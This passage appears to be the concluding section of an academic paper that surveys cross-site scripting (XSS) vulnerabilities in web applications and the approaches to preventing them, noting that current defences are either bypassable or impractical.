In this paper, we have studied a specific case of attack against web applications. We have seen how the existence of cross-site scripting (XSS for short) vulnerabilities in web applications can involve a great risk for both the application itself and its users. We have also surveyed existing approaches for the prevention of XSS attacks on vulnerable applications, discussing their benefits and drawbacks. Whether dealing with persistent or non-persistent XSS attacks, there are currently very interesting approaches to solving the problem. However, these solutions present some failures: some do not provide enough security and can be easily bypassed, while others are so complex that they become impractical in real situations.